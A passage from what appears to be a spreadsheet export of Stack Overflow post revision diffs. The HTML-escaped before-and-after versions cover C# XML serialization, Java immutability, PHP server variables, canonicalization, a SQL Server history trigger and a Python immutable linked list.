            evt.WriteXml(writer);_x000D_
            writer.WriteEndElement();_x000D_
        }_x000D_
    }_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Event&lt;/span&gt; : &lt;span class="hljs-title"&gt;IXmlSerializable&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; XmlSchema &lt;span class="hljs-title"&gt;GetSchema&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt; { &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-literal"&gt;null&lt;/span&gt;; }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;ReadXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlReader reader&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (reader.MoveToContent() == XmlNodeType.Element &amp;amp;&amp;amp; reader.LocalName == &lt;span class="hljs-string"&gt;"Event"&lt;/span&gt;)_x000D_
        {_x000D_
            _Title = reader[&lt;span class="hljs-string"&gt;"Title"&lt;/span&gt;];_x000D_
            _Start = DateTime.FromBinary(Int64.Parse(reader[&lt;span class="hljs-string"&gt;"Start"&lt;/span&gt;]));_x000D_
            _Stop = DateTime.FromBinary(Int64.Parse(reader[&lt;span class="hljs-string"&gt;"Stop"&lt;/span&gt;]));_x000D_
            reader.Read();_x000D_
        }_x000D_
    }_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;WriteXml&lt;/span&gt;(&lt;span class="hljs-params"&gt;XmlWriter writer&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Title"&lt;/span&gt;, _Title);_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Start"&lt;/span&gt;, _Start.ToBinary().ToString());_x000D_
        writer.WriteAttributeString(&lt;span class="hljs-string"&gt;"Stop"&lt;/span&gt;, _Stop.ToBinary().ToString());_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Immutable objects are objects that can't be changed programmatically. They're especially good for multi-threaded environments or other environments where more than one process is able to alter (mutate) the values in an object.&lt;/p&gt; _x000D_
 &lt;p&gt; Just to clarify, however, StringBuilder is actually a mutable object, not an immutable one. A regular java String is immutable (meaning that once it's been created you cannot change the underlying string without changing the object).&lt;/p&gt; _x000D_
 &lt;p&gt; For example, let's say that I have a class called ColoredString that has a String value and a String color:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class ColoredString {_x000D_
    _x000D_
    private &lt;span class="diff-delete"&gt;final &lt;/span&gt;String color;_x000D_
    private&lt;span class="diff-delete"&gt; final&lt;/span&gt; String string;_x000D_
    _x000D_
    public ColoredString(String color, String string) {_x000D_
        this.color  = color;_x000D_
        this.string = string;_x000D_
    }_x000D_
    _x000D_
    public String getColor()  { return this.color;  }_x000D_
    public String getString() { return this.string; }_x000D_
    _x000D_
    public void setColor(String newColor) {_x000D_
        this.color = newColor;_x000D_
    }_x000D_
    _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In this example, the ColoredString is said to be mutable because you can change (mutate) one of its key properties without creating a new ColoredString class. The reason why this may be bad is, for example, let's say you have a GUI application which has multiple threads and you are using ColoredStrings to print data to the window. If you have an instance of ColoredString which was created as&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;new ColoredString("Blue", "This is a blue string!");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then you would expect the string to always be "Blue". If another thread, however, got ahold of this instance and called&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;blueString.setColor("Red");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You would suddenly, and probably unexpectedly, now have a "Red" string when you wanted a "Blue" one. Because of this, immutable objects are almost always preferred when passing instances of objects around. When you have a case where mutable objects are really necessary, then you would typically guard the objet by only passing copies out from your specific field of control.&lt;/p&gt; _x000D_
 &lt;p&gt; To recap, in Java, java.lang.String is an immutable object (it &lt;em&gt;cannot&lt;/em&gt; be changed once it's created) and java.lang.StringBuilder is a mutable object because it can be changed without creating a new instance.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Immutable objects are objects that can't be changed programmatically. They're especially good for multi-threaded environments or other environments where more than one process is able to alter (mutate) the values in an object.&lt;/p&gt; _x000D_
 &lt;p&gt; Just to clarify, however, StringBuilder is actually a mutable object, not an immutable one. A regular java String is immutable (meaning that once it's been created you cannot change the underlying string without changing the object).&lt;/p&gt; _x000D_
 &lt;p&gt; For example, let's say that I have a class called ColoredString that has a String value and a String color:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class ColoredString {_x000D_
    _x000D_
    private String color;_x000D_
    private String string;_x000D_
    _x000D_
    public ColoredString(String color, String string) {_x000D_
        this.color  = color;_x000D_
        this.string = string;_x000D_
    }_x000D_
    _x000D_
    public String getColor()  { return this.color;  }_x000D_
    public String getString() { return this.string; }_x000D_
    _x000D_
    public void setColor(String newColor) {_x000D_
        this.color = newColor;_x000D_
    }_x000D_
    _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In this example, the ColoredString is said to be mutable because you can change (mutate) one of its key properties without creating a new ColoredString class. The reason why this may be bad is, for example, let's say you have a GUI application which has multiple threads and you are using ColoredStrings to print data to the window. If you have an instance of ColoredString which was created as&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;new ColoredString("Blue", "This is a blue string!");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then you would expect the string to always be "Blue". If another thread, however, got ahold of this instance and called&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;blueString.setColor("Red");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You would suddenly, and probably unexpectedly, now have a "Red" string when you wanted a "Blue" one. Because of this, immutable objects are almost always preferred when passing instances of objects around. When you have a case where mutable objects are really necessary, then you would typically guard the objet by only passing copies out from your specific field of control.&lt;/p&gt; _x000D_
 &lt;p&gt; To recap, in Java, java.lang.String is an immutable object (it &lt;em&gt;cannot&lt;/em&gt; be changed once it's created) and java.lang.StringBuilder is a mutable object because it can be changed without creating a new instance.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jason Coco</t>
  </si>
  <si>
    <t>Bill K</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am building a PHP app in CodeIgniter. CI sends all requests to the main controller, /index.php.&lt;/p&gt; _x000D_
 &lt;p&gt; However, I don't like to see the index.php in the URL, so I've used mod_rewrite, as per the CI documentation.&lt;/p&gt; _x000D_
 &lt;p&gt; The rule is as follows:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;RewriteEngine on_x000D_
RewriteCond $1 !^(images|inc|favicon\.ico|index\.php|robots\.txt)_x000D_
RewriteRule ^(.*)$ /index.php/$1 [L]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So for example,&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;http://www.example.com/faq/whatever _x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; will route to&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;http://www.example.com/index.php/faq/whatever_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I need a reliable way for a script to know what &lt;span class="diff-delete"&gt;its&lt;/span&gt; address is, so it will know what to do with the navigation.&lt;/p&gt; _x000D_
 &lt;p&gt; Normally, I would just check &lt;code&gt;&lt;span class="diff-delete"&gt;PHP_SELF&lt;/span&gt;&lt;/code&gt;, but in this case it's always index.php. I can get it from &lt;code&gt;&lt;span class="diff-delete"&gt;REQUEST_URI&lt;/span&gt;&lt;/code&gt;, &lt;code&gt;&lt;span class="diff-delete"&gt;PATH_INFO&lt;/span&gt;&lt;/code&gt;, etc, but trying to decide which will be most reliable.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone know the real difference between &lt;code&gt;&lt;span class="diff-delete"&gt;PHP_SELF&lt;/span&gt;&lt;/code&gt;, &lt;code&gt;&lt;span class="diff-delete"&gt;PATH_INFO&lt;/span&gt;&lt;/code&gt;, &lt;code&gt;&lt;span class="diff-delete"&gt;SCRIPT_NAME&lt;/span&gt;&lt;/code&gt;, and &lt;code&gt;&lt;span class="diff-delete"&gt;REQUEST_URI&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am building a PHP app in CodeIgniter. CI sends all requests to the main controller, /index.php.&lt;/p&gt; _x000D_
 &lt;p&gt; However, I don't like to see the index.php in the URL, so I've used mod_rewrite, as per the CI documentation.&lt;/p&gt; _x000D_
 &lt;p&gt; The rule is as follows:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;RewriteEngine on_x000D_
RewriteCond $1 !^(images|inc|favicon\.ico|index\.php|robots\.txt)_x000D_
RewriteRule ^(.*)$ /index.php/$1 [L]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So for example,&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.example.com/faq/whatever" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.example.com/faq/whatever&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; will route to&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.example.com/index.php/faq/whatever" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.example.com/index.php/faq/whatever&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I need a reliable way for a script to know what &lt;span class="diff-add"&gt;it's&lt;/span&gt; address is, so it will know what to do with the navigation.&lt;/p&gt; _x000D_
 &lt;p&gt; Normally, I would just check &lt;span class="diff-add"&gt;php_self&lt;/span&gt;, but in this case it's always index.php. I can get it from &lt;span class="diff-add"&gt;REQUEST _ URI&lt;/span&gt;, &lt;span class="diff-add"&gt;PATH _ INFO&lt;/span&gt;, etc, but trying to decide which will be most reliable.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone&lt;span class="diff-add"&gt; know, or&lt;/span&gt; know&lt;span class="diff-add"&gt; where to find,&lt;/span&gt; the real difference between &lt;span class="diff-add"&gt;PHP _ SELF&lt;/span&gt;, &lt;span class="diff-add"&gt;PATH _ INFO&lt;/span&gt;, &lt;span class="diff-add"&gt;SCRIPT _ NAME&lt;/span&gt;, and &lt;span class="diff-add"&gt;REQUEST _ URI&lt;/span&gt;?&lt;span class="diff-add"&gt; (Note, I've had to add spaces, as SO sees the underscore and makes it italic for some reason)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks!&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Eli</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Wikipedia points to the term &lt;a href="http://en.wikipedia.org/wiki/Canonicalization" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Canonicalization&lt;/span&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; A process for converting data that has more than one possible representation into a "standard" canonical representation. This can be done to compare different representations for equivalence, to count the number of distinct data structures, to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; The &lt;strong&gt;Unicode&lt;/strong&gt; example made the most sense to me:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Variable-length encodings in the Unicode standard, in particular UTF-8, have more than one possible encoding for most common characters. This makes string validation more complicated, since every possible encoding of each string character must be considered. A software implementation which does not consider all character encodings runs the risk of accepting strings considered invalid in the application design, which could cause bugs or allow attacks. The solution is to allow a single encoding for each character. Canonicalization is then the process of translating every string character to its single allowed encoding. An alternative is for software to determine whether a string is canonicalized, and then reject it if it is not. In this case, in a client/server context, the canonicalization would be the responsibility of the client.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; In summary, a standard form of representation for data. From this form you can then convert to any representation you may need.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Wikipedia points to the term &lt;span class="diff-add"&gt;[Canonicalization][1]&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; A process for converting data that has more than one possible representation into a "standard" canonical representation. This can be done to compare different representations for equivalence, to count the number of distinct data structures, to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; The &lt;strong&gt;Unicode&lt;/strong&gt; example made the most sense to me:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Variable-length encodings in the Unicode standard, in particular UTF-8, have more than one possible encoding for most common characters. This makes string validation more complicated, since every possible encoding of each string character must be considered. A software implementation which does not consider all character encodings runs the risk of accepting strings considered invalid in the application design, which could cause bugs or allow attacks. The solution is to allow a single encoding for each character. Canonicalization is then the process of translating every string character to its single allowed encoding. An alternative is for software to determine whether a string is canonicalized, and then reject it if it is not. In this case, in a client/server context, the canonicalization would be the responsibility of the client.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; In summary, a standard form of representation for data. From this form you can then convert to any representation you may need.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Brian G.&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; [1]: &lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Canonicalization" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://en.wikipedia.org/wiki/Canonicalization&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brian Gianforcaro</t>
  </si>
  <si>
    <t>Tim Cooper</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function Hello()_x000D_
{_x000D_
    alert("caller is " + arguments.callee.caller.toString());_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;arguments.callee.caller.name&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; will provide you the function's name&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function Hello()_x000D_
{_x000D_
    alert("caller is " + arguments.callee.caller.toString());_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sami</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Maybe this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;CREATE TRIGGER _x000D_
    [dbo].[SystemParameterInsertUpdate]_x000D_
ON _x000D_
    [dbo].[SystemParameter]_x000D_
FOR INSERT, UPDATE _x000D_
AS_x000D_
  BEGIN_x000D_
    SET NOCOUNT ON_x000D_
_x000D_
      INSERT INTO SystemParameterHistory _x000D_
      (_x000D_
        Attribute,_x000D_
        ParameterValue,_x000D_
        ParameterDescription,_x000D_
        ChangeDate_x000D_
      )_x000D_
    SELECT_x000D_
      Attribute,_x000D_
      ParameterValue,_x000D_
      ParameterDescription,_x000D_
      ChangeDate_x000D_
    FROM Inserted&lt;span class="diff-delete"&gt; _x000D_
    WHERE&lt;/span&gt; &lt;span class="diff-delete"&gt;Attribute NOT LIKE&lt;/span&gt; &lt;span class="diff-delete"&gt;'NoHist%'&lt;/span&gt;_x000D_
END_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Maybe this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;CREATE TRIGGER _x000D_
    [dbo].[SystemParameterInsertUpdate]_x000D_
ON _x000D_
    [dbo].[SystemParameter]_x000D_
FOR INSERT, UPDATE _x000D_
AS_x000D_
  BEGIN_x000D_
    SET NOCOUNT ON_x000D_
_x000D_
      &lt;span class="diff-add"&gt;If (SELECT Attribute FROM INSERTED) LIKE 'NoHist_%'_x000D_
      Begin_x000D_
          Return_x000D_
      End_x000D_
_x000D_
      &lt;/span&gt;INSERT INTO SystemParameterHistory _x000D_
      (_x000D_
        Attribute,_x000D_
        ParameterValue,_x000D_
        ParameterDescription,_x000D_
        ChangeDate_x000D_
      )_x000D_
    SELECT_x000D_
      Attribute,_x000D_
      ParameterValue,_x000D_
      ParameterDescription,_x000D_
      ChangeDate_x000D_
    FROM Inserted &lt;span class="diff-add"&gt;AS&lt;/span&gt; &lt;span class="diff-add"&gt;I&lt;/span&gt;_x000D_
END_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import itertools_x000D_
_x000D_
class LinkedList(object):_x000D_
    """Immutable linked list class."""_x000D_
    def &lt;span class="diff-delete"&gt;__init__&lt;/span&gt;(&lt;span class="diff-delete"&gt;self&lt;/span&gt;, l=[]):_x000D_
        i = iter(l)_x000D_
        try:_x000D_
            &lt;span class="diff-delete"&gt;self._head&lt;/span&gt; = i.next(&lt;span class="diff-delete"&gt;)_x000D_
            self._tail = LinkedList(i&lt;/span&gt;)_x000D_
        except StopIteration:_x000D_
            &lt;span class="diff-delete"&gt;#&lt;/span&gt; &lt;span class="diff-delete"&gt;Note:&lt;/span&gt; &lt;span class="diff-delete"&gt;List&lt;/span&gt; &lt;span class="diff-delete"&gt;ends&lt;/span&gt; &lt;span class="diff-delete"&gt;with&lt;/span&gt; &lt;span class="diff-delete"&gt;sentinel&lt;/span&gt; &lt;span class="diff-delete"&gt;value&lt;/span&gt; &lt;span class="diff-delete"&gt;with&lt;/span&gt; &lt;span class="diff-delete"&gt;tail=None&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        &lt;span class="diff-delete"&gt;self._tail&lt;/span&gt; = &lt;span class="diff-delete"&gt;None    # End of list.&lt;/span&gt;_x000D_
_x000D_
    @classmethod_x000D_
    def cons(cls, head, tail):_x000D_
        ll =  cls([head])_x000D_
        if not isinstance(tail, cls):_x000D_
            tail = cls(tail)_x000D_
        ll._tail = tail_x000D_
        return ll_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;_x000D_
    # head and tail are not modifiable_x000D_
    @property  _x000D_
    def head(self): return self._head_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;_x000D_
    @property_x000D_
    def tail(self): &lt;span class="diff-delete"&gt;_x000D_
        if self._tail is None:_x000D_
            raise StopIteration("End of linked list")_x000D_
        &lt;/span&gt;return self._tail_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;_x000D_
    def __nonzero__(self):&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; return&lt;span class="diff-delete"&gt; self._tail is not&lt;/span&gt; &lt;span class="diff-delete"&gt;None&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;_x000D_
    def __len__(self):_x000D_
        &lt;span class="diff-delete"&gt;if self._tail is None: &lt;/span&gt;return&lt;span class="diff-delete"&gt; 0_x000D_
      &lt;/span&gt;  &lt;span class="diff-delete"&gt;return&lt;/span&gt; &lt;span class="diff-delete"&gt;1&lt;/span&gt; &lt;span class="diff-delete"&gt;+&lt;/span&gt; &lt;span class="diff-delete"&gt;len(&lt;/span&gt;self&lt;span class="diff-delete"&gt;._tail&lt;/span&gt;)&lt;span class="diff-delete"&gt;  # Simple, but not that efficient.&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;_x000D_
    def __add__(self, other):_x000D_
        &lt;span class="diff-delete"&gt;if not isinstance(&lt;/span&gt;other&lt;span class="diff-delete"&gt;, LinkedList):_x000D_
           &lt;/span&gt; &lt;span class="diff-delete"&gt;other &lt;/span&gt;= LinkedList(other)_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;_x000D_
        if not self: return other   # () + l = l_x000D_
        start=l = LinkedList(self)  # Create copy, as we'll mutate_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;_x000D_
        while l:_x000D_
            if not l._tail: # Last element?_x000D_
                l._tail = other_x000D_
                break_x000D_
            l = l._tail_x000D_
        return start_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;_x000D_
    def __radd__(self, other):_x000D_
        return LinkedList(other) + self_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;_x000D_
    def __iter__(self):_x000D_
        x=self_x000D_
        while x:_x000D_
            yield x.head_x000D_
            x=x.tail_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;_x000D_
    def __getitem__(self, idx):_x000D_
        """Get item at specified index"""_x000D_
        if isinstance(idx, slice):_x000D_
            # Special case: Avoid constructing a new list, or performing O(n) length &lt;span class="diff-delete"&gt;calculation&lt;/span&gt;_x000D_
            # for slices like l[3:].  Since we're immutable, just return &lt;span class="diff-delete"&gt;the&lt;/span&gt; &lt;span class="diff-delete"&gt;appropriate&lt;/span&gt; &lt;span class="diff-delete"&gt;node.&lt;/span&gt; &lt;span class="diff-delete"&gt;This&lt;/span&gt; &lt;span class="diff-delete"&gt;becomes_x000D_
&lt;/span&gt;            &lt;span class="diff-delete"&gt;#&lt;/span&gt; O(start) rather than O(n)_x000D_
            # We can't do this for  more complicated slices however&lt;span class="diff-delete"&gt;.&lt;/span&gt;_x000D_
            start = idx.start or 0_x000D_
            if (start &amp;gt;= 0) and (idx.stop is None) and (idx.step is None or idx.step == 1):_x000D_
                no_copy_needed=True_x000D_
            else:_x000D_
                length = len(self)  # Need to calc length._x000D_
                start, stop, step = idx.indices(length)_x000D_
                no_copy_needed = (stop == length) and (step == 1)_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;_x000D_
            if no_copy_needed:_x000D_
                l = self_x000D_
                for i in range(start): l=l.tail_x000D_
                return l_x000D_
            else:_x000D_
                # We need to construct a new list._x000D_
                return LinkedList(itertools.islice(iter(self), start, stop, step))_x000D_
        else:       _x000D_
            # Non-slice index._x000D_
            if idx &amp;lt; 0: idx = len(self)+idx_x000D_
            if &lt;span class="diff-delete"&gt;self._tail is&lt;/span&gt; &lt;span class="diff-delete"&gt;None&lt;/span&gt;: raise IndexError("list index out of range")_x000D_
            if idx == 0: return self.head_x000D_
            return self.tail[idx-1]_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;_x000D_
    def __mul__(self, n):_x000D_
        if n &amp;lt;= 0: return &lt;span class="diff-delete"&gt;LinkedList()&lt;/span&gt;_x000D_
        l=self_x000D_
        for i in range(n-1): l += self_x000D_
        return l_x000D_
    def __rmul__(self, n): return self * n_x000D_
&lt;span class="diff-delete"&gt;    _x000D_
    def __eq__(self, other):_x000D_
        return (self is other) or isinstance(other, LinkedList) and all(a==b for (a,b) in itertools.izip(self, other))_x000D_
    &lt;/span&gt;_x000D_
    &lt;span class="diff-delete"&gt;def __ne__(self, other): return not self == other_x000D_
    _x000D_
    &lt;/span&gt;#&lt;span class="diff-delete"&gt; The below methods&lt;/span&gt; &lt;span class="diff-delete"&gt;aren't&lt;/span&gt; &lt;span class="diff-delete"&gt;implemented&lt;/span&gt; &lt;span class="diff-delete"&gt;very&lt;/span&gt; &lt;span class="diff-delete"&gt;efficiently.&lt;/span&gt;  &lt;span class="diff-delete"&gt;For&lt;/span&gt; &lt;span class="diff-delete"&gt;better&lt;/span&gt; &lt;span class="diff-delete"&gt;performance&lt;/span&gt; &lt;span class="diff-delete"&gt;they&lt;/span&gt; _x000D_
    #&lt;span class="diff-delete"&gt; should be&lt;/span&gt; &lt;span class="diff-delete"&gt;implemented&lt;/span&gt; &lt;span class="diff-delete"&gt;directly&lt;/span&gt; &lt;span class="diff-delete"&gt;so&lt;/span&gt; as &lt;span class="diff-delete"&gt;not&lt;/span&gt; &lt;span class="diff-delete"&gt;to&lt;/span&gt; &lt;span class="diff-delete"&gt;require&lt;/span&gt; &lt;span class="diff-delete"&gt;constructing&lt;/span&gt; &lt;span class="diff-delete"&gt;an&lt;/span&gt; &lt;span class="diff-delete"&gt;intermediate&lt;/span&gt; &lt;span class="diff-delete"&gt;tuple.&lt;/span&gt;_x000D_
    def __hash__(self): return hash(tuple(self))_x000D_
    def &lt;span class="diff-delete"&gt;__lt__&lt;/span&gt;(self, other): return &lt;span class="diff-delete"&gt;tuple&lt;/span&gt;(self) &lt;span class="diff-delete"&gt;&amp;lt;&lt;/span&gt; other_x000D_
    def &lt;span class="diff-delete"&gt;__gt__&lt;/span&gt;(self, other): return &lt;span class="diff-delete"&gt;tuple&lt;/span&gt;(self) &lt;span class="diff-delete"&gt;&amp;gt;&lt;/span&gt; other_x000D_
    def __le__(self, other): return &lt;span class="diff-delete"&gt;tuple(&lt;/span&gt;self) &amp;lt;= &lt;span class="diff-delete"&gt;other&lt;/span&gt;_x000D_
    def __ge__(self, other): return &lt;span class="diff-delete"&gt;tuple(&lt;/span&gt;self) &amp;gt;= other_x000D_
        _x000D_
    def __repr__(self):_x000D_
        return "LinkedList([%s])" % ', '.join(map(repr,self))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import itertools_x000D_
_x000D_
class LinkedList(object):_x000D_
    """Immutable linked list class."""_x000D_
&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;    def &lt;span class="diff-add"&gt;__new__&lt;/span&gt;(&lt;span class="diff-add"&gt;cls&lt;/span&gt;, l=[]&lt;span class="diff-add"&gt;):_x000D_
        if isinstance(l, LinkedList&lt;/span&gt;):&lt;span class="diff-add"&gt; return l # Immutable, so no copy needed.&lt;/span&gt;_x000D_
        i = iter(l)_x000D_
        try:_x000D_
            &lt;span class="diff-add"&gt;head&lt;/span&gt; = i.next()_x000D_
        except StopIteration:_x000D_
            &lt;span class="diff-add"&gt;return&lt;/span&gt; &lt;span class="diff-add"&gt;cls.EmptyList&lt;/span&gt;   &lt;span class="diff-add"&gt;#&lt;/span&gt; &lt;span class="diff-add"&gt;Return&lt;/span&gt; &lt;span class="diff-add"&gt;empty&lt;/span&gt; &lt;span class="diff-add"&gt;list&lt;/span&gt; &lt;span class="diff-add"&gt;singleton.&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;        &lt;span class="diff-add"&gt;tail&lt;/span&gt; = &lt;span class="diff-add"&gt;LinkedList(i)&lt;/span&gt;_x000D_
_x000D_
&lt;span class="diff-add"&gt;        obj = super(LinkedList, cls).__new__(cls)_x000D_
        obj._head = head_x000D_
        obj._tail = tail_x000D_
        return obj_x000D_
_x000D_
&lt;/span&gt;    @classmethod_x000D_
    def cons(cls, head, tail):_x000D_
        ll =  cls([head])_x000D_
        if not isinstance(tail, cls):_x000D_
            tail = cls(tail)_x000D_
        ll._tail = tail_x000D_
        return ll_x000D_
_x000D_
    # head and tail are not modifiable_x000D_
    @property  _x000D_
    def head(self): return self._head_x000D_
_x000D_
    @property_x000D_
    def tail(self): return self._tail_x000D_
_x000D_
